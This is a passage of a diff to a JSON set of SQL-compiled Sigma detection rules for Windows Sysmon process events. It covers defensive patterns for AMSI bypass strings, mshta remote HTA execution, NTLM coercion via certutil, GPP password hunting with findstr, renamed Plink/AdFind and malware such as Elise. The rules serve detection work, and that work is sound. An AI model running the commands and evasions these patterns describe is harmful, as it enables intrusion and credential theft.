Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate administration activity" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "description": "Detects the execution of a renamed version of the Plink binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.execution" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "status": "experimental", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": "proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", - "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "status": "experimental", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_x509enrollment.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "status": "test", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.defense_evasion" + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "status": "test", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1564.004" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Registry Modification Via Regini.EXE", - "id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "status": "experimental", - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate modification of keys" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regini_execution.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid 